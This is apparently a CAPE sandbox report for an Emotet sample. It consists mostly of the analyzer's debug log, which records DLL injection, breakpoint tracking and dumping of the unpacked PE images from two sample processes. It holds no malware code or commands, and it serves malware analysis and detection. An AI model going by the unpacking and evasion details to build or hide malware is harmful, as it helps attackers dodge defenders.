CAPE

Detections: Emotet


Analysis

Category Package Started Completed Duration Options Log
FILE Extraction 2019-10-10 01:01:37 2019-10-10 01:06:23 286 seconds Show Options Show Log
  • Info: The analysis hit the critical timeout, terminating.
route = internet
procdump = 0
2019-10-10 02:01:37,000 [root] INFO: Date set to: 10-10-19, time set to: 01:01:37, timeout set to: 200
2019-10-10 02:01:37,015 [root] DEBUG: Starting analyzer from: C:\esgppejl
2019-10-10 02:01:37,015 [root] DEBUG: Storing results at: C:\QegxeawP
2019-10-10 02:01:37,015 [root] DEBUG: Pipe server name: \\.\PIPE\eKzZugK
2019-10-10 02:01:37,015 [root] INFO: Analysis package "Extraction" has been specified.
2019-10-10 02:01:37,421 [root] DEBUG: Started auxiliary module Browser
2019-10-10 02:01:37,421 [root] DEBUG: Started auxiliary module Curtain
2019-10-10 02:01:37,421 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2019-10-10 02:01:37,825 [modules.auxiliary.digisig] DEBUG: File is not signed.
2019-10-10 02:01:37,825 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2019-10-10 02:01:37,825 [root] DEBUG: Started auxiliary module DigiSig
2019-10-10 02:01:37,858 [root] DEBUG: Started auxiliary module Disguise
2019-10-10 02:01:37,858 [root] DEBUG: Started auxiliary module Human
2019-10-10 02:01:37,858 [root] DEBUG: Started auxiliary module Screenshots
2019-10-10 02:01:37,858 [root] DEBUG: Started auxiliary module Sysmon
2019-10-10 02:01:37,858 [root] DEBUG: Started auxiliary module Usage
2019-10-10 02:01:37,858 [root] INFO: Analyzer: DLL set to Extraction.dll from package modules.packages.Extraction
2019-10-10 02:01:37,858 [root] INFO: Analyzer: DLL_64 set to Extraction_x64.dll from package modules.packages.Extraction
2019-10-10 02:01:37,888 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe" with arguments "" with pid 1964
2019-10-10 02:01:37,888 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2019-10-10 02:01:37,888 [lib.api.process] INFO: 32-bit DLL to inject is C:\esgppejl\dll\JpZrOO.dll, loader C:\esgppejl\bin\GwzPaJk.exe
2019-10-10 02:01:37,904 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\eKzZugK.
2019-10-10 02:01:37,904 [root] DEBUG: Loader: Injecting process 1964 (thread 420) with C:\esgppejl\dll\JpZrOO.dll.
2019-10-10 02:01:37,904 [root] DEBUG: Process image base: 0x00400000
2019-10-10 02:01:37,904 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\esgppejl\dll\JpZrOO.dll.
2019-10-10 02:01:37,904 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0049C000 - 0x77110000
2019-10-10 02:01:37,904 [root] DEBUG: InjectDllViaIAT: Allocated 0x200 bytes for new import table at 0x004A0000.
2019-10-10 02:01:37,904 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 02:01:37,904 [root] DEBUG: Successfully injected DLL C:\esgppejl\dll\JpZrOO.dll.
2019-10-10 02:01:37,904 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1964
2019-10-10 02:01:39,917 [lib.api.process] INFO: Successfully resumed process with pid 1964
2019-10-10 02:01:39,917 [root] INFO: Added new process to list with pid: 1964
2019-10-10 02:01:40,009 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 02:01:40,009 [root] DEBUG: Process dumps disabled.
2019-10-10 02:01:40,119 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 02:01:40,119 [root] INFO: Disabling sleep skipping.
2019-10-10 02:01:40,119 [root] INFO: Disabling sleep skipping.
2019-10-10 02:01:40,119 [root] INFO: Disabling sleep skipping.
2019-10-10 02:01:40,119 [root] INFO: Disabling sleep skipping.
2019-10-10 02:01:40,119 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x7716124a, Wow64PrepareForException: 0x0
2019-10-10 02:01:40,119 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x280000
2019-10-10 02:01:40,119 [root] DEBUG: Debugger initialised.
2019-10-10 02:01:40,119 [root] DEBUG: CAPE initialised: 32-bit Extraction package loaded in process 1964 at 0x747e0000, image base 0x400000, stack from 0x186000-0x190000
2019-10-10 02:01:40,119 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe".
2019-10-10 02:01:40,119 [root] DEBUG: AddTrackedRegion: EntryPoint 0x7dd3, Entropy 4.831530e+00
2019-10-10 02:01:40,119 [root] DEBUG: AddTrackedRegion: Region at 0x00400000 size 0x1000 added to tracked regions.
2019-10-10 02:01:40,119 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2019-10-10 02:01:40,119 [root] INFO: Monitor successfully loaded in process with pid 1964.
2019-10-10 02:01:40,165 [root] DEBUG: Allocation: 0x00350000 - 0x00360000, size: 0x10000, protection: 0x40.
2019-10-10 02:01:40,165 [root] DEBUG: AddTrackedRegion: Region at 0x00350000 size 0x10000 added to tracked regions.
2019-10-10 02:01:40,165 [root] DEBUG: ActivateBreakpoints: TrackedRegion->AllocationBase: 0x00350000, TrackedRegion->RegionSize: 0x10000, thread 420
2019-10-10 02:01:40,165 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xe0, Size=0x2, Address=0x00350000 and Type=0x1.
2019-10-10 02:01:40,165 [root] DEBUG: SetThreadBreakpoint: Set bp 0 thread id 420 type 1 at address 0x00350000, size 2 with Callback 0x747e7700.
2019-10-10 02:01:40,165 [root] DEBUG: ActivateBreakpoints: Set write breakpoint on empty protect address: 0x00350000
2019-10-10 02:01:40,181 [root] DEBUG: SetDebugRegister: Setting breakpoint 1 hThread=0xe0, Size=0x4, Address=0x0035003C and Type=0x1.
2019-10-10 02:01:40,181 [root] DEBUG: SetThreadBreakpoint: Set bp 1 thread id 420 type 1 at address 0x0035003C, size 4 with Callback 0x747e7320.
2019-10-10 02:01:40,181 [root] DEBUG: ActivateBreakpoints: Set write breakpoint on e_lfanew address: 0x0035003C
2019-10-10 02:01:40,181 [root] DEBUG: AllocationHandler: Breakpoints set on newly-allocated executable region at: 0x00350000 (size 0x10000).
2019-10-10 02:01:40,197 [root] DEBUG: DLL unloaded from 0x772F0000.
2019-10-10 02:01:40,197 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x74DBAE7A (thread 420)
2019-10-10 02:01:40,197 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x00350000.
2019-10-10 02:01:40,197 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 2 within Context, Size=0x0, Address=0x00350000 and Type=0x0.
2019-10-10 02:01:40,197 [root] DEBUG: BaseAddressWriteCallback: byte written to 0x350000: 0xce.
2019-10-10 02:01:40,197 [root] DEBUG: BaseAddressWriteCallback: Exec bp set on tracked region protect address.
2019-10-10 02:01:40,197 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x74DBAE7A (thread 420)
2019-10-10 02:01:40,197 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x0035003C.
2019-10-10 02:01:40,197 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xdc777811 (at 0x0035003C).
2019-10-10 02:01:40,197 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x00350000 already exists for thread 420 (process 1964), skipping.
2019-10-10 02:01:40,197 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x00350000.
2019-10-10 02:01:40,197 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 420)
2019-10-10 02:01:40,197 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x00350000.
2019-10-10 02:01:40,197 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x00350000 already exists for thread 420 (process 1964), skipping.
2019-10-10 02:01:40,197 [root] DEBUG: BaseAddressWriteCallback: byte written to 0x350000: 0xe8.
2019-10-10 02:01:40,197 [root] DEBUG: BaseAddressWriteCallback: Exec bp set on tracked region protect address.
2019-10-10 02:01:40,197 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 420)
2019-10-10 02:01:40,197 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x00350000.
2019-10-10 02:01:40,197 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x00350000 already exists for thread 420 (process 1964), skipping.
2019-10-10 02:01:40,197 [root] DEBUG: BaseAddressWriteCallback: byte written to 0x350000: 0xe8.
2019-10-10 02:01:40,197 [root] DEBUG: BaseAddressWriteCallback: Exec bp set on tracked region protect address.
2019-10-10 02:01:40,197 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 420)
2019-10-10 02:01:40,197 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x0035003C.
2019-10-10 02:01:40,197 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xdc777856 (at 0x0035003C).
2019-10-10 02:01:40,197 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x00350000 already exists for thread 420 (process 1964), skipping.
2019-10-10 02:01:40,197 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x00350000.
2019-10-10 02:01:40,197 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 420)
2019-10-10 02:01:40,213 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x0035003C.
2019-10-10 02:01:40,213 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xdc775756 (at 0x0035003C).
2019-10-10 02:01:40,213 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x00350000 already exists for thread 420 (process 1964), skipping.
2019-10-10 02:01:40,213 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x00350000.
2019-10-10 02:01:40,213 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 420)
2019-10-10 02:01:40,213 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x0035003C.
2019-10-10 02:01:40,213 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xdc335756 (at 0x0035003C).
2019-10-10 02:01:40,213 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x00350000 already exists for thread 420 (process 1964), skipping.
2019-10-10 02:01:40,213 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x00350000.
2019-10-10 02:01:40,213 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 420)
2019-10-10 02:01:40,213 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x0035003C.
2019-10-10 02:01:40,213 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xf6335756 (at 0x0035003C).
2019-10-10 02:01:40,213 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x00350000 already exists for thread 420 (process 1964), skipping.
2019-10-10 02:01:40,213 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x00350000.
2019-10-10 02:01:40,213 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x00350000 (thread 420)
2019-10-10 02:01:40,213 [root] DEBUG: ShellcodeExecCallback: Breakpoint 2 at Address 0x00350000 (allocation base 0x00350000).
2019-10-10 02:01:40,213 [root] DEBUG: ShellcodeExecCallback: Debug: About to scan region for a PE image (base 0x00350000, size 0x10000).
2019-10-10 02:01:40,213 [root] DEBUG: DumpPEsInRange: Scanning range 0x350000 - 0x360000.
2019-10-10 02:01:40,213 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x35053f
2019-10-10 02:01:40,213 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump 'raw' PE image.
2019-10-10 02:01:40,213 [root] DEBUG: DumpPE: Instantiating PeParser with address: 0x0035053F.
2019-10-10 02:01:40,213 [root] INFO: Added new CAPE file to list with path: C:\QegxeawP\CAPE\1964_17295749364015104102019
2019-10-10 02:01:40,229 [root] DEBUG: DumpPE: PE file in memory dumped successfully - dump size 0xfa00.
2019-10-10 02:01:40,229 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x35073f-0x360000.
2019-10-10 02:01:40,229 [root] DEBUG: ShellcodeExecCallback: PE image(s) detected and dumped.
2019-10-10 02:01:40,229 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x350000 - 0x360000.
2019-10-10 02:01:40,229 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x00350000.
2019-10-10 02:01:40,229 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 1 address 0x0035003C.
2019-10-10 02:01:40,229 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 2 address 0x00350000.
2019-10-10 02:01:40,229 [root] DEBUG: set_caller_info: Adding region at 0x00350000 to caller regions list.
2019-10-10 02:01:40,229 [root] DEBUG: AddTrackedRegion: EntryPoint 0xd1c5, Entropy 5.271777e+00
2019-10-10 02:01:40,229 [root] DEBUG: AddTrackedRegion: Region at 0x00360000 size 0xe200 added to tracked regions.
2019-10-10 02:01:40,229 [root] DEBUG: ProtectionHandler: Address: 0x00361000 (alloc base 0x00360000), NumberOfBytesToProtect: 0xd200, NewAccessProtection: 0x20
2019-10-10 02:01:40,229 [root] DEBUG: ProtectionHandler: New code detected at (0x00360000), scanning for PE images.
2019-10-10 02:01:40,229 [root] DEBUG: DumpPEsInRange: Scanning range 0x360000 - 0x36e200.
2019-10-10 02:01:40,229 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x360000
2019-10-10 02:01:40,229 [root] DEBUG: DumpImageInCurrentProcess: Disguised PE image (bad MZ and/or PE headers) at 0x00360000
2019-10-10 02:01:40,229 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-10-10 02:01:40,243 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00360000.
2019-10-10 02:01:40,243 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000D1C5.
2019-10-10 02:01:40,243 [root] INFO: Added new CAPE file to list with path: C:\QegxeawP\CAPE\1964_18180795804011104102019
2019-10-10 02:01:40,243 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xf400.
2019-10-10 02:01:40,243 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x360200-0x36e200.
2019-10-10 02:01:40,243 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x00360000.
2019-10-10 02:01:40,243 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x360000 - 0x36e200.
2019-10-10 02:01:40,243 [root] DEBUG: set_caller_info: Adding region at 0x00360000 to caller regions list.
2019-10-10 02:01:40,243 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-10-10 02:01:40,276 [root] INFO: Announced 32-bit process name: ygg9ytft62s5ip.exe pid: 1436
2019-10-10 02:01:40,276 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2019-10-10 02:01:40,276 [lib.api.process] INFO: 32-bit DLL to inject is C:\esgppejl\dll\JpZrOO.dll, loader C:\esgppejl\bin\GwzPaJk.exe
2019-10-10 02:01:40,276 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\eKzZugK.
2019-10-10 02:01:40,276 [root] DEBUG: Loader: Injecting process 1436 (thread 2924) with C:\esgppejl\dll\JpZrOO.dll.
2019-10-10 02:01:40,276 [root] DEBUG: Process image base: 0x00400000
2019-10-10 02:01:40,276 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\esgppejl\dll\JpZrOO.dll.
2019-10-10 02:01:40,276 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0049C000 - 0x77110000
2019-10-10 02:01:40,276 [root] DEBUG: InjectDllViaIAT: Allocated 0x200 bytes for new import table at 0x004A0000.
2019-10-10 02:01:40,276 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 02:01:40,276 [root] DEBUG: Successfully injected DLL C:\esgppejl\dll\JpZrOO.dll.
2019-10-10 02:01:40,276 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1436
2019-10-10 02:01:40,290 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 1964).
2019-10-10 02:01:40,290 [root] DEBUG: DLL unloaded from 0x75140000.
2019-10-10 02:01:40,290 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 1964).
2019-10-10 02:01:40,290 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 02:01:40,290 [root] INFO: Notified of termination of process with pid 1964.
2019-10-10 02:01:40,290 [root] DEBUG: Process dumps disabled.
2019-10-10 02:01:40,306 [root] INFO: Disabling sleep skipping.
2019-10-10 02:01:40,306 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 02:01:40,322 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x7716124a, Wow64PrepareForException: 0x0
2019-10-10 02:01:40,338 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x4a0000
2019-10-10 02:01:40,338 [root] DEBUG: Debugger initialised.
2019-10-10 02:01:40,338 [root] DEBUG: CAPE initialised: 32-bit Extraction package loaded in process 1436 at 0x747e0000, image base 0x400000, stack from 0x186000-0x190000
2019-10-10 02:01:40,338 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\--400e05c0.
2019-10-10 02:01:40,354 [root] DEBUG: AddTrackedRegion: EntryPoint 0x7dd3, Entropy 4.831530e+00
2019-10-10 02:01:40,354 [root] DEBUG: AddTrackedRegion: Region at 0x00400000 size 0x1000 added to tracked regions.
2019-10-10 02:01:40,368 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2019-10-10 02:01:40,368 [root] INFO: Added new process to list with pid: 1436
2019-10-10 02:01:40,368 [root] INFO: Monitor successfully loaded in process with pid 1436.
2019-10-10 02:01:40,400 [root] DEBUG: Allocation: 0x01DA0000 - 0x01DB0000, size: 0x10000, protection: 0x40.
2019-10-10 02:01:40,400 [root] DEBUG: AddTrackedRegion: Region at 0x01DA0000 size 0x10000 added to tracked regions.
2019-10-10 02:01:40,400 [root] DEBUG: ActivateBreakpoints: TrackedRegion->AllocationBase: 0x01DA0000, TrackedRegion->RegionSize: 0x10000, thread 2924
2019-10-10 02:01:40,400 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xd0, Size=0x2, Address=0x01DA0000 and Type=0x1.
2019-10-10 02:01:40,400 [root] DEBUG: SetThreadBreakpoint: Set bp 0 thread id 2924 type 1 at address 0x01DA0000, size 2 with Callback 0x747e7700.
2019-10-10 02:01:40,400 [root] DEBUG: ActivateBreakpoints: Set write breakpoint on empty protect address: 0x01DA0000
2019-10-10 02:01:40,400 [root] DEBUG: SetDebugRegister: Setting breakpoint 1 hThread=0xd0, Size=0x4, Address=0x01DA003C and Type=0x1.
2019-10-10 02:01:40,400 [root] DEBUG: SetThreadBreakpoint: Set bp 1 thread id 2924 type 1 at address 0x01DA003C, size 4 with Callback 0x747e7320.
2019-10-10 02:01:40,400 [root] DEBUG: ActivateBreakpoints: Set write breakpoint on e_lfanew address: 0x01DA003C
2019-10-10 02:01:40,400 [root] DEBUG: AllocationHandler: Breakpoints set on newly-allocated executable region at: 0x01DA0000 (size 0x10000).
2019-10-10 02:01:40,400 [root] DEBUG: DLL unloaded from 0x772F0000.
2019-10-10 02:01:40,400 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x74DBAE7A (thread 2924)
2019-10-10 02:01:40,415 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x01DA0000.
2019-10-10 02:01:40,415 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 2 within Context, Size=0x0, Address=0x01DA0000 and Type=0x0.
2019-10-10 02:01:40,415 [root] DEBUG: BaseAddressWriteCallback: byte written to 0x1da0000: 0xce.
2019-10-10 02:01:40,415 [root] DEBUG: BaseAddressWriteCallback: Exec bp set on tracked region protect address.
2019-10-10 02:01:40,431 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x74DBAE7A (thread 2924)
2019-10-10 02:01:40,431 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x01DA003C.
2019-10-10 02:01:40,431 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xdc777811 (at 0x01DA003C).
2019-10-10 02:01:40,431 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x01DA0000 already exists for thread 2924 (process 1436), skipping.
2019-10-10 02:01:40,431 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x01DA0000.
2019-10-10 02:01:40,431 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 2924)
2019-10-10 02:01:40,477 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x01DA0000.
2019-10-10 02:01:40,477 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x01DA0000 already exists for thread 2924 (process 1436), skipping.
2019-10-10 02:01:40,493 [root] DEBUG: BaseAddressWriteCallback: byte written to 0x1da0000: 0xe8.
2019-10-10 02:01:40,493 [root] DEBUG: BaseAddressWriteCallback: Exec bp set on tracked region protect address.
2019-10-10 02:01:40,493 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 2924)
2019-10-10 02:01:40,493 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x01DA0000.
2019-10-10 02:01:40,493 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x01DA0000 already exists for thread 2924 (process 1436), skipping.
2019-10-10 02:01:40,493 [root] DEBUG: BaseAddressWriteCallback: byte written to 0x1da0000: 0xe8.
2019-10-10 02:01:40,493 [root] DEBUG: BaseAddressWriteCallback: Exec bp set on tracked region protect address.
2019-10-10 02:01:40,509 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 2924)
2019-10-10 02:01:40,509 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x01DA003C.
2019-10-10 02:01:40,509 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xdc777856 (at 0x01DA003C).
2019-10-10 02:01:40,509 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x01DA0000 already exists for thread 2924 (process 1436), skipping.
2019-10-10 02:01:40,509 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x01DA0000.
2019-10-10 02:01:40,525 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 2924)
2019-10-10 02:01:40,525 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x01DA003C.
2019-10-10 02:01:40,525 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xdc775756 (at 0x01DA003C).
2019-10-10 02:01:40,525 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x01DA0000 already exists for thread 2924 (process 1436), skipping.
2019-10-10 02:01:40,540 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x01DA0000.
2019-10-10 02:01:40,540 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 2924)
2019-10-10 02:01:40,540 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x01DA003C.
2019-10-10 02:01:40,540 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xdc335756 (at 0x01DA003C).
2019-10-10 02:01:40,540 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x01DA0000 already exists for thread 2924 (process 1436), skipping.
2019-10-10 02:01:40,540 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x01DA0000.
2019-10-10 02:01:40,540 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 2924)
2019-10-10 02:01:40,540 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x01DA003C.
2019-10-10 02:01:40,540 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xf6335756 (at 0x01DA003C).
2019-10-10 02:01:40,555 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x01DA0000 already exists for thread 2924 (process 1436), skipping.
2019-10-10 02:01:40,555 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x01DA0000.
2019-10-10 02:01:40,555 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x01DA0000 (thread 2924)
2019-10-10 02:01:40,555 [root] DEBUG: ShellcodeExecCallback: Breakpoint 2 at Address 0x01DA0000 (allocation base 0x01DA0000).
2019-10-10 02:01:40,555 [root] DEBUG: ShellcodeExecCallback: Debug: About to scan region for a PE image (base 0x01DA0000, size 0x10000).
2019-10-10 02:01:40,555 [root] DEBUG: DumpPEsInRange: Scanning range 0x1da0000 - 0x1db0000.
2019-10-10 02:01:40,555 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x1da053f
2019-10-10 02:01:40,555 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump 'raw' PE image.
2019-10-10 02:01:40,555 [root] DEBUG: DumpPE: Instantiating PeParser with address: 0x01DA053F.
2019-10-10 02:01:40,572 [root] INFO: Added new CAPE file to list with path: C:\QegxeawP\CAPE\1436_2166171764015104102019
2019-10-10 02:01:40,572 [root] DEBUG: DumpPE: PE file in memory dumped successfully - dump size 0xfa00.
2019-10-10 02:01:40,572 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x1da073f-0x1db0000.
2019-10-10 02:01:40,572 [root] DEBUG: ShellcodeExecCallback: PE image(s) detected and dumped.
2019-10-10 02:01:40,588 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x1da0000 - 0x1db0000.
2019-10-10 02:01:40,588 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x01DA0000.
2019-10-10 02:01:40,588 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 1 address 0x01DA003C.
2019-10-10 02:01:40,588 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 2 address 0x01DA0000.
2019-10-10 02:01:40,588 [root] DEBUG: set_caller_info: Adding region at 0x01DA0000 to caller regions list.
2019-10-10 02:01:40,588 [root] DEBUG: AddTrackedRegion: EntryPoint 0xd1c5, Entropy 5.294979e+00
2019-10-10 02:01:40,588 [root] DEBUG: AddTrackedRegion: Region at 0x01DB0000 size 0xe200 added to tracked regions.
2019-10-10 02:01:40,588 [root] DEBUG: ProtectionHandler: Address: 0x01DB1000 (alloc base 0x01DB0000), NumberOfBytesToProtect: 0xd200, NewAccessProtection: 0x20
2019-10-10 02:01:40,602 [root] DEBUG: ProtectionHandler: New code detected at (0x01DB0000), scanning for PE images.
2019-10-10 02:01:40,602 [root] DEBUG: DumpPEsInRange: Scanning range 0x1db0000 - 0x1dbe200.
2019-10-10 02:01:40,602 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x1db0000
2019-10-10 02:01:40,602 [root] DEBUG: DumpImageInCurrentProcess: Disguised PE image (bad MZ and/or PE headers) at 0x01DB0000
2019-10-10 02:01:40,602 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-10-10 02:01:40,618 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x01DB0000.
2019-10-10 02:01:40,618 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000D1C5.
2019-10-10 02:01:40,930 [root] INFO: Process with pid 1964 has terminated
2019-10-10 02:01:41,086 [root] INFO: Added new CAPE file to list with path: C:\QegxeawP\CAPE\1436_1382759474011104102019
2019-10-10 02:01:41,134 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xf400.
2019-10-10 02:01:41,134 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x1db0200-0x1dbe200.
2019-10-10 02:01:41,148 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x01DB0000.
2019-10-10 02:01:41,164 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x1db0000 - 0x1dbe200.
2019-10-10 02:01:41,164 [root] DEBUG: set_caller_info: Adding region at 0x01DB0000 to caller regions list.
2019-10-10 02:01:47,374 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-10-10 02:01:47,404 [root] DEBUG: DLL loaded at 0x743A0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-10-10 02:01:47,467 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-10-10 02:01:47,483 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-10-10 02:01:47,483 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
